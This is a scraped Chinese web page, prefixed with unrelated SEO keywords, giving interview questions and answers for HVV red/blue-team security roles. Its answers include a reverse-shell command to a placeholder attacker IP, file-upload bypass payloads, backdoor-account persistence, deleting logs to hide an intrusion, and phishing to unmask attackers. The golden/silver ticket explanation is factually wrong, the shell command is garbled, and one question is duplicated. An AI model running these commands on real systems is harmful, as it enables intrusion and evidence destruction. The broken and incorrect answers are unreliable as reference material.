北京企业网站制作,网站建设公司固定ip,有什么好的网站做数学题吗,app开发制作哪种快网络安全领域各种资源#xff0c;学习文档#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具#xff0c;欢迎关注。 一、HVV行动面试题分类 根据面试题的内容#xff0c;我们将其分为以下几类#xff1a; 漏洞利用与攻击技术 …网络安全领域各种资源学习文档以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具欢迎关注。 一、HVV行动面试题分类 根据面试题的内容我们将其分为以下几类 漏洞利用与攻击技术 防御与应急响应 工具与流量特征 内网渗透与横向移动 溯源与反制 安全设备与日志分析 权限维持与后渗透 常见漏洞与利用方式 网络安全基础知识 二、分类解析与答案 漏洞利用与攻击技术 1shiro的流量特征是什么 Shiro的流量特征通常包括Cookie中的rememberMe字段攻击者通过构造恶意的序列化数据利用Shiro的反序列化漏洞进行攻击。常见的攻击流量中会包含rememberMe字段且其值为经过AES加密的恶意序列化数据。 2fastjson不出网怎么利用 当fastjson不出网时可以通过以下方式利用 - 将命令执行结果写入静态文件然后通过其他方式读取。 - 使用DNSLog外带数据。 - 利用Commons-io写文件或植入Webshell。 - 通过BECL攻击导致命令执行或植入内存马。 3Java内存马如何排查 Java内存马通常通过Filter、Servlet、Listener等方式植入。 排查思路包括 - 检查Filter、Servlet、Listener等组件的加载情况。 - 使用工具如Arthas动态排查内存中的可疑类。 - 对于冰蝎类型的内存马可以通过分析JVM内存中的类加载情况查找可疑的类名或方法。 4讲下内存⻢排查思路 - 首先判断是什么方式注入的内存马 - 可以通过查看web日志以及看是否有类似哥斯拉、冰蝎的流量特征 - 如果web日志中没有发现那么我们就可以排查中间件的error.log日志 防御与应急响应 1内网爆出多条异常该怎么处理 处理内网异常时应按照以下步骤进行 -隔离立即隔离受感染的机器防止横向扩散。 -分析分析异常流量的来源和目的确定攻击类型。 -修复修复漏洞清除恶意文件或进程。 - 监控加强监控确保攻击已被彻底清除。 2如何判断文件上传告警是否为真实攻击 判断文件上传告警是否为真实攻击的步骤包括 -分析文件内容检查上传的文件是否为Webshell或其他恶意文件。 -检查请求来源分析上传请求的IP地址和User-Agent判断是否为恶意来源。 -验证漏洞确认上传功能是否存在漏洞是否可以被利用。 工具与流量特征 1CS和MSF的流量特征是什么 - Cobalt Strike (CS)CS的流量特征包括加密的HTTP/HTTPS通信常见的URI路径如/jquery-3.3.1.min.js以及Beacon的心跳包。 - Metasploit Framework (MSF)MSF的流量特征包括特定的URI路径如/meterpreter/reverse_tcp以及Meterpreter的加密通信。 2菜刀、蚁剑、冰蝎、哥斯拉的流量特征是什么 - 蚁剑流量特征主要表现在数据包的加密方式和数据类型。蚁剑使用了AES加密算法对数据进行加密同时还使用了自定义的二进制协议在通信中传输各种类型的数据。 - 菜刀流量特征主要表现在HTTP协议上使用HTTP协议通信控制命令和数据都通过POST请求传输。因此可以通过HTTP请求头中的User-Agent、Referer等信息进行识别eval函数必不可少有可能会被asser代替。 - 冰蝎流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中包含了特定的标记如1ag0x52415631用于标识该数据包是冰蝎的控制命令。此外冰蝎还使用了一种自定义的二进制协议在通信中传输各种类型的数据 - 哥斯拉则流量特征主要表现在数据包的特殊标记和数据类型。哥斯拉的数据包中包含了特定的标记如XORHEAD和XORBODY用于标识该数据包是哥斯拉的控制命令。此外哥斯拉还使用了一种自定义的二进制协议在通信中传输各种类型的数据。 内网渗透与横向移动 1内网不出网怎么利用 当内网不出网时可以通过以下方式利用 - SMB协议利用SMB协议进行横向移动如通过PsExec、WMI等工具。 - 代理转发使用工具如frp、ngrok等进行端口转发将内网服务暴露到外网。 - DNS隧道通过DNS隧道进行数据传输绕过网络限制。 2如何判断二层网络FPP文件落地成功 判断FPP文件是否落地成功可以通过以下方式 -网络抓包使用Wireshark等工具抓取网络流量分析是否有FPP文件的传输。 -日志分析检查目标系统的日志查看是否有文件写入的记录。 -文件校验通过MD5或SHA1校验文件完整性确认文件是否成功落地。 3讲下黄金票据和白银票据 -黄金票据也称为“域管理员组帐户”拥有黄金票据的用户可以访问域中所有计算机的本地管理员帐户能够创建新的域管理员和更改现有的域管理员帐户密码 -白银票据通常属于本地管理员帐户只能访问本地计算机并执行特定任务。无法访问其他计算机或管理其他本地管理员帐户 -区别 黄金票据通常指一个具有域管理员权限的票据而白银票据通常指普通用户的票据 溯源与反制 1如何溯源拿到手机号码 溯源手机号码的步骤包括 -分析日志通过分析攻击流量的日志查找攻击者的IP地址。 -关联信息通过IP地址关联到攻击者的手机号码或其他个人信息。 -社工手段通过社工手段如钓鱼邮件获取攻击者的手机号码。 2如何判断SQL注入是否成功 判断SQL注入是否成功可以通过以下方式 -回显信息查看页面是否返回数据库的错误信息或查询结果。 -延时注入通过延时函数如sleep判断注入是否成功。 -布尔盲注通过布尔逻辑判断注入是否成功。 安全设备与日志分析 1. 如何从海量告警中筛选出真实有效的攻击 筛选真实攻击的步骤包括 -告警分类根据告警类型如SQL注入、文件上传等进行分类。 -流量分析分析告警流量的来源、目的和内容判断是否为恶意流量。 -误报排除通过规则或人工分析排除误报如扫描器流量、正常业务流量等。 2如何分析Web日志 Web日志分析的关键在于识别异常请求。可以通过分析HTTP状态码、请求频率、请求路径、User-Agent等信息找出可疑的访问行为。常见的攻击特征包括SQL注入、XSS、文件上传等。 3常用的渗透测试端口有哪些 常用的渗透测试端口包括 - 22 (SSH) - 80 (HTTP) - 443 (HTTPS) - 445 (SMB) - 3389 (RDP) - 3306 (MySQL) - 8080 (HTTP Alt) 权限维持与后渗透 1权限维持有哪些方式 权限维持的常见方式包括 - 创建隐藏用户或后门账户 - 植入Webshell或内存马 - 利用计划任务或服务持久化 - 使用黄金票据或白银票据进行Kerberos认证绕过 2如何反弹Shell 反弹Shell的常见方法包括使用Netcat、Bash、Python等工具。例如使用bash -i /dev/tcp/攻击者IP/端口 01命令可以将Shell反弹到攻击者的机器上。 3如何清除渗透后的痕迹 清除渗透痕迹的步骤包括 - 删除日志删除系统日志、Web日志、安全设备日志等。 - 清理文件删除上传的Webshell、后门文件等。 - 恢复配置恢复被修改的系统配置、服务配置等。 常见漏洞与利用方式 1SQL注入的原理是什么 SQL注入是通过在用户输入中插入恶意的SQL代码使得应用程序在执行数据库查询时执行这些恶意代码。攻击者可以通过SQL注入获取数据库中的敏感信息、修改数据、甚至控制整个数据库服务器。 2文件上传的绕过方式有哪些 文件上传的绕过方式包括 - 修改文件扩展名 - 使用双扩展名如shell.php.jpg - 修改Content-Type - 利用文件头绕过检测 - 使用空字节截断如shell.php%00.jpg 3常见的未授权访问漏洞有哪些 常见的未授权访问漏洞包括 - Redis未授权访问通过未授权访问Redis获取敏感数据或执行命令。 - MongoDB未授权访问通过未授权访问MongoDB获取数据库内容。 - Elasticsearch未授权访问通过未授权访问Elasticsearch获取索引数据。 4文件上传的绕过方式有哪些 文件上传的绕过方式包括 - 修改文件扩展名将恶意文件扩展名改为允许上传的类型如.jpg改为.php。 - 修改Content-Type将请求头中的Content-Type改为允许的类型如image/jpeg。 - 双写扩展名通过双写扩展名绕过检测如shell.php.jpg 网络安全基础知识 1什么是公钥基础设施PKI 公钥基础设施PKI是一种基于公钥加密技术的安全框架用于管理数字证书和公钥。PKI在网络安全中扮演着重要角色主要用于身份验证、数据加密和数字签名。 2正向代理和反向代理的区别是什么 -正向代理客户端通过代理服务器访问外部资源代理服务器隐藏客户端的真实IP。 -反向代理客户端通过代理服务器访问内部资源代理服务器隐藏后端服务器的真实IP。 3HTTP状态码200、302、403、404分别表示什么? -200 请求成功 -302跳转 -403 权限拒绝 -404 页面资源不存在 其他 1.您有没有HVV经历做的什么岗位 2.您参与过哪些项目 3.您看过哪些安全设备 ...... 对于这类问题如果缺乏实际经验通常会被归为初级水平除非在技术上表现特别出色。因此在回答时你要尽可能详尽地展示自己对安全设备的理解包括与之相关的硬件HW知识。同时强调自己已经为此做了充分的准备展现出对安全领域的热情和专注。 4毕业了吗那平时工作具体工作内容是什么 已经毕业了平常在公司主要负责公司项目渗透测试、应急响应、安全加固、安全培训等工作。 5平常有挖过src嘛可以说说你的资产收集过程嘛 -首先确定我们要挖的公司资产 -使用wps新建一个exec表格里面新建好几个表格备注比如根域名、子域名、小程序、app以及漏洞提交进度等情况 -上爱企查看这个企业的知识产权然后看网站备案然后看这个公司的股权穿透图这里有一个找边缘资产的好方法就是看股权穿透图找下面的子公司但是不同的企业src收录标准不一 -使用小蓝本查该公司的一个小程序、app然后保存在exec表格里面 -使用oneforall工具进行子域名挖掘然后保存到一个txt里面再使用灯塔进行子域名挖掘再汇总然后使用无影工具里面的辅助模块进行资产分类 -使用灯塔ARL自动化跑去找一些文件泄露的漏洞 6有自己的技术博客嘛在先知、freebuf等平台发表过文章嘛 都有自己一直有保持写技术博文的习惯 7你学校成绩如何有挂科吗 学习成绩优秀没有挂过科在校期间获得多次校级奖学金以及各种荣誉或者比赛相关成绩 8未来你想做安全的哪一个领域 目前的话还是打算先以贵公司实习为目的然后以后打算安全的方向的话主要以渗透测试、安服、红蓝攻防这些方向靠。